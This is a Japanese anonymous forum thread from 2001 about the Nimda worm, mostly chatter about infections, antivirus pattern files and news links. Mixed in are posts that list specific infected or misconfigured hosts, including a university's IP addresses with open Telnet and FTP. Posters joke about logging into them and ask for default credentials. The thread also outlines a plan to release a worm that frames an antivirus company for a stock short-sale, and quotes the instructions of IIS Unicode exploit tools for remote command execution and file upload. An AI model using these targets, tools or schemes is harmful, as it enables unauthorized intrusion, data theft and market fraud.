つまりあれかい、Cobalt Qubeに移そうとして挫折してる、と(^^;

>>766
んだなや。だれかWinに移植してくれんかのう。

>>766
インストールしたよ。でもまだ１匹も捕まえてない。
最近アクセスも少ないし。。。。

>>753

入れたさ（´。｀；）

http://211.11.222.51/
ここ行ったさ。

だまってダウンロードしちゃうさ┐（´ー｀）┌

>>767
挫折というか放置というかデフォ状態って感じ。
ついでにFTP,TELNET共外部からのアクセスを許可してる。
メルサバも第三者中継許可してるんじゃないだろうな。アフォー

今日現在も・・。

http://www.d-link.co.jp/

ソースもみてね。

>>771

ftp://202.223.228.9/

ホントだ！　こばるとのftpのデフォルトアカウントってなんだっけ？（ぉぃ

>>771

つまり、宝塚造形芸術大学 短期大学部によって

875 ：追加 ：01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

は証明されたと・・（´。｀；）

>>769

ぜひ試してみてくださいm(_ _)m

---
>>643

>>641
> というか、それ狙ってくる。

あ、それってこれと関係あります？

158 名前：ん〜ま 投稿日：01/09/20 23:31
linuxなのだが試しに、ダミーのroot.exeとか置いたらアクセスが増えてしまったｗ

>>773

Telnet://202.223.228.9

あははははは、あは、あは、あは・・・。

te○net://210.151.237.34

ぷっ。ひでー

わくちん屋の株を空売り
↓
そのわくちん屋の名前が含まれたワームをばらまく
↓
わくちん屋の株 暴落
↓
株を買い戻して大儲け!

名前でなくて、その会社の持っているIPアドレスとを「攻撃し
ないアドレス」として仕込んだ方がそれっぽいかもね。ワーム
を解析して行くうちに「なんだこりゃ」という騒ぎになるよう
に計算して作る。

わくちん屋が「俺じゃない」と言っても「調査研究の為にワー
ムを作っているうちに、間違って流出させてしらんぷり」と思
われて、簡単に容疑は晴れない。必死に言い訳するほど逆効果。

わくちん屋じゃなくても、同じことはできるけどね。わくちん
屋をターゲットにするのが一番効果的。

新発見のセキュリティーホールを公開するのと同じ理屈で書い
てみたよ。関係者のみなさんは「犯人は俺じゃない」と言うた
めにはどしたらよいか、今のうちに考えておいてね。

>>777

おいおい（ｗ

>>777
侵入成功

>>777

これって・・。

>>777

試しちゃったじゃねーか (ﾟдﾟ)ﾏｽﾞｰ

こういうの試してるとこんなふうになるんじゃねーの？
http://www.asahi.com/national/update/0927/019.html

>>783

ＰとＤ見間違えてるぞ。メガネかけろ。

>>783
いやその前にこうなる。キーワードは「煮ちゃんねる」(w
http://www.asahi.com/tech/feature/K2001092300440.html

なに、警鐘を鳴らしたまでのことだ。
PとかDとか細かいことは気にすんな。

777 = 783 て？（ｗ

>>785
それはあるなー。
実際、海外のIPだの、　.com　.net　だのがたたけない会社、知ってる(^^;

IE6のプレビュー使ってたんだけど、どうなんだろ、これ。
やばそうだからuninstallしようと思ったらできないよ、これ。
仕方がないから、IE6を標準構成でinstallしようと思ったら、ディスク容量がたらんっていわれたよ。
しゃーないから、ディスク整理して、キャパ空けたよ。んで、installしたよ。
で、すぐにoutlookをuninstallしたけど、大丈夫なんだろうか？
その他諸々の付属品もuninstallしたいけど、どーなんだろ、これ。

http://wtc.trendmicro.com/wtc/
http://wtc.trendmicro.com/wtc/report.html
痛い。全体的には減っているが昨日に比べてアジア（ニッポソ）のアタックだけが増加中。
何事も遅いニッポソ。

べつに逮捕されてもいいよ。
不要なパケットを垂れ流して放置してるやつこそ社会の敵だ。

確かパスワードデフォルト垂れ流しはﾀｲｰﾎされなかったような気がする。
法律勉強したいなぁ。

>>792
金銭的や、物的、社会的損害を受けない限り頼んでも警察なんて動いてくれないよ(´Д`)

>>790 ﾆﾎﾟﾝ，ｶｺﾜﾙｲ(´Д`)

悩屯先生、またあたらしいパターンファイル出てるぞー。

ニムダの世の中になってから、ノートン先生の最終ウイルス検知日がいつ見ても０日前・・。

>>790
ニムダの検出は現在日本が世界一だ・・。

ニムダなんじゃねーの？（ｗ

http://headlines.yahoo.co.jp/hl?a=20010927-00000023-mai-bus_all

＜ソニー銀行＞システムに障害　口座サイトにログインできず
同行はサーバーの一部に障害が発生したと説明しているが、原因は判明していない。

qchainぐらいは知って置いた方が良いかも。
ServerだけじゃなくてProにも使えるよん。
http://www.port139.co.jp/ntsec_hotfix.htm

age

で Nimda にやられたW引導sマシンはどうやったら
remoteからshutdownできるの?できればスクリプトきぼんぬ

>>790
>>797
っていうか、それトレンドマイクロのオンライン・ウィルス・スキャンや製品
で発見された数がベースでしょ。

トレンドマイクロの主要市場が日本と台湾、北米なんだから、そこに偏っ
て当然と思われ。

それともトレンドマイクロがマカフィやシマンテックみたく、アメリカの会社
と信じてたの？

>>802

うんにゃ。１８日ごろは北米のほうが遙かに多かったのだ。

age

>>744
安置ういるすインストに、オンライン登録も含む、、だったのでし
だから、める設定がさきになってんだ〜。
ま、先にＩＥｕｐｄａｔｅしとっから、ここまできぃつけんでもええかとは思ったんだが
気分の問題（ｗ

>>805
www.antivirus.com/download/pattern.asp
で最新版のパターンをDLしてくれば登録しなくても平気だよ。

検索エンジンのアップデートは、
www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm

>>806

新規で買ってきたときはだめづら。そもそも、そのための　>>742　では。

>>803
日本で対策が遅れているのは、21日にIPAが収束宣言を出したため。

http://www.mainichi.co.jp/digital/netfile/archive/200109/21-1.html
IPAは「届け件数の伸びから考えると被害は収束する方向にある」と分析している。
IPAによると、18日深夜に確認されたニムダが初めてIPAに届け出があったのは19日。初日は19件
（午後4時30分時点）、翌20日は65件（同）だった。今年7月に全国的に被害の遭った「サーカム」
は11日間で700件を超えたケースと比較すると被害は少ないと見ている。

>>808

おおお、漏れもそう思う。激しく同意！＞日本で対策が遅れているのは

>>806
つかこれ、最新パターンにならないやん＞とれんどマイ糞

>>808
まだこんなのあるしな。

http://211.11.222.51/

最近買った雑誌のオマケIE5.5は行進バージョン0のばっかでした。
っていうか何台もいちいち電話かけてつなげにいくの大変なんだけど‥‥。
SP2のが付いる雑誌情報きぼんぬ。
月刊ヤフーみたいのとNetなんとか（ナビ？）って雑誌はチェック済み
（両方１０月号）

>>812
雑誌社に責任を問おう

>>807
新規で買わずに、体験版で十分。
内容は同じで、シリアル番号を入力するかしないかの違い。
体験版では新しいパターンに更新できないようになってるが、806から
ダウンロードすれば更新できる。
更新方法については、
//inet.trendmicro.co.jp/contents/download/ptnupdate.txt
を参照のこと。

>>812
＞っていうか何台もいちいち電話かけてつなげにいくの大変なんだけど‥‥。

？？？？？？？？

ただ閉じてるだけのところ、日本には山ほどあるよね。

http://www.takara-univ.ac.jp/
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.sg-jc.ac.jp/
http://www.advaoptical.co.jp/
http://www.computools.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/

このへんが復活したらどうなるんだろう。　嵐が収まったから玄関あけよう、みたいなところも多いような・・。

こんなとこもあるし。
http://pc2.autechs-unet.ocn.ne.jp

10月再開って、なんか目途があるんだろうか。
http://www.with9.com/

>>812
セットアップフォルダﾋﾟｰｺしろよ…

>>814

んだから806に置いてるパターンがすでに古いやん＞とれんどマイ糞

>>814
VOTE喰らって氏ね。

>>806

http://www.antivirus.com/download/pattern.asp
デッドリンク

http://www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm
パターン古い

806はﾈﾀ

ボクの大好きボタン1発ツールなのら〜！
[XXExploit ]
･･is a program that will search for the Uni Code Exploit
In Microsoft IIS servers.
If the exploit is found, the program will then attempt to connect giving you
the right to execute DOS commands.

も一つ。
[IISXXXXX]
・・・・
Now press the "Query Server" button and then the program will do some
magics and show you the name of the server that is running on that machine.
look at the status screen. If you see Microsoft-IIS 4.0 or IIS 5.0 this is
good , then it will tell you can the server be exploited or not.

Go to "Upload Files" Tab, the first object is "Remote Dir"
this means where files must be upoaded to ( the Path to it on
the victims computer ).

Directory Listing
-----------------
3. Here is not many things to explain, you just need to write the path that you
want to check for files at the "Directory" stirig , and it will show you the files
that located on that path. Example : C:\winnt will show you all the files and
directories that located at the Windows NT folder. If you need to list files in long name
dirs you can use dos style like: c:\progra~1\common\ (c:\program files\common\) or
you can put all the path in brakets (" ") like: "c:\program files\common"

Now we go forward and study how to searh for files.
It's easy just after dir path enter + and /S parameter.
For example this command: "c:\CCs\*.mdb+/S" will search for all *.mdb files
in c:\CCs\ directory. Including all sub directories.
* If you will search for c:\*.* - it will give you all files and their path in c:\
* Such search method is slow (dependin on server speed)
* Dont Forget to click "List Files" button . =)
- This software is provided "AS IS", and you, its
user, assume the entire risk as to its quality and
accuracy.

>>760
どうみても自分の使ってるＣＡＴＶ屋の、他のユーザーからの攻撃がくるのよ・・。

>>761
> なぜ貴方はそう思ふのか

24.19.79.215
こやつがポートスキャンしてくるのだが、

@Home Network (NETBLK-ATHOME) ATHOME 24.0.0.0 - 24.23.255.255
@Home Network (NETBLK-BB1-RDC2-TX-11) BB1-RDC2-TX-11 24.19.64.0 - 24.19.79.255

これは、うちのプロバイダー（ケーブルテレビ屋）なのだ。

ウリナラの仕業だニムダ！

>>669
ここの問題のページはなくなって
"セキュリティー確保の為、しばらく落札情報は停止いたします。ご了承ください。"
だって。。
騒動が収まることがセキュ確保と思ってないことを祈る！

>>823

ここにニムダが紛れ込んでいたのも、
http://www.hyundaijapan.co.jp/

>>ウリナラの仕業だニムダ！

　　　　うゎ〜ん。ニムダに感染しちゃったよー。
￣￣￣￣￣￣￣￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　 　 Λ＿Λ
　　　　　　　　　　（ ゜∀⊂ヽ ﾆﾔﾘ
　　　　　　　　　 ⊂　　　　ノ
　　　　　　　　　　 人　 Ｙ
　　　　　　　　　　し （＿）

ニダウイルス


　　　　　∧∧
　　　　<｀∀´>
　　　　　≡
　　／＼≡／＼
　　　　　│

定点観察

http://www.takara-univ.ac.jp/
http://202.223.228.5
閉鎖中

http://Exchange.takara-univ.ac.jp
http://202.223.228.9
画像なしの不完全表示

http://202.223.228.4
正常表示

Telnet://202.223.228.9
（ぉ

ftp://202.223.228.9/
（ぅ

以上、今朝の宝塚造形芸術大学 短期大学部



http://www.hyundaijapan.co.jp/ は正常復旧したものとみて観察終了

>>811
>http://211.11.222.51/

これ、なに?

http://www.oishiine.co.jp/

は直ってるみたいだけど…

>>829

http://www.oishiine.com

これと関連はあるのか？

>>829

対策されたみたいだね。

かわりにこれとか。
http://www.bee.woodland.co.jp

ふ〜ん・・・
ttp://www.zdnet.co.jp/news/0109/28/e_nimda.html

　　　　　うわ〜ん、感染から１０日たったよ〜
￣￣￣￣￣￣￣￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　 　 Λ＿Λ
　　　　　　　　　　（ ゜∀⊂ヽ ﾆﾔﾘ
　　　　　　　　　 ⊂　　　　ノ
　　　　　　　　　　 人　 Ｙ
　　　　　　　　　　し （＿）
http://www.zdnet.co.jp/news/0109/28/e_nimda.html

しかしなんだねぇ。

お気楽管理者としては自分のマシンからのポートスキャンとかが検知できて、くい止めたり告知するようなのがほしいだろうねぇ。

中小企業でも買える１万円以下の。

ゆうべ　ノートンも　バスターも　パターンファイルが新しくなっていたので、更新した。

が、ノートンはきょう昼ごろまた新しくなっていた（＠＠〜☆

http://www.zdnet.co.jp/news/bursts/0109/21/people.html
中国一号って名前けっこう気に入った。
でもなんで一号？
ところでnimdaってのは発見者がつけた名前なの？adminの逆というのは
あちこちに書いてあるけど、なんでこうしたと書いてあるところ
が見つからない。

>>833

きょうで、ニムダ関連の各種緊急配布を終了するところが多いらしい。

お試し版の入手を検討しているひとはおはやめに。
https://www.netsecurity.ne.jp/article/1/2908.html

http://www.symantec.co.jp/region/jp/sarcj/defs.download.html
（最新に更新前）
http://www.trendmicro.co.jp/homeuser/download/vb2001sp6p.htm
（すでにふるい）

日本コンピュータウィルス学会の見解では「韓国１号」になってますが、、、

まだ感染してるよ・・。

我社の特徴
ttp://www.sano-mfg.co.jp/tokucyo/tokuchou.htm

昨日、うちのサーバがapnicのサーバからnimda攻撃されていた。

>>833
わーい。再感染者爆発だー。

>>840

まじ？攻撃してきた鯖のIP公開されたし。

>>841
わーい
http://japan.cnet.com/News/2001/Item/010928-2.html?mn

再感染警戒age

その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

>>845
ひまだねえ。

つーかageのあとに「その画像ならココ」もないもんだが。
しかし、いつもそのあとにすぐフォロー入れる漏れもヒマだねぇ・・。

>>846

リンク色変わってるしな σ(--;

ttp://www.bee.woodland.co.jp
mailto:[email protected]
未対策、感染放置、ひどいもんだ。

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 28 Sep 2001 **:**:** GMT
Content-Type: text/html
Set-Cookie: ********************=************************; path=/
Cache-control: private

ねーねー。うちの会社のネットワークおかしくなってるんだけど
ニムダ活動再開か？？

他に同じ人いる？　インターネットつながらないからダイアルアップ
でつないでるんだけど

>>848
つまり、だれも管理してない、ってことなんだろうか・・・。

>近畿文化体系策定協議会内 実行委員会

まあそうなんだろうな(--;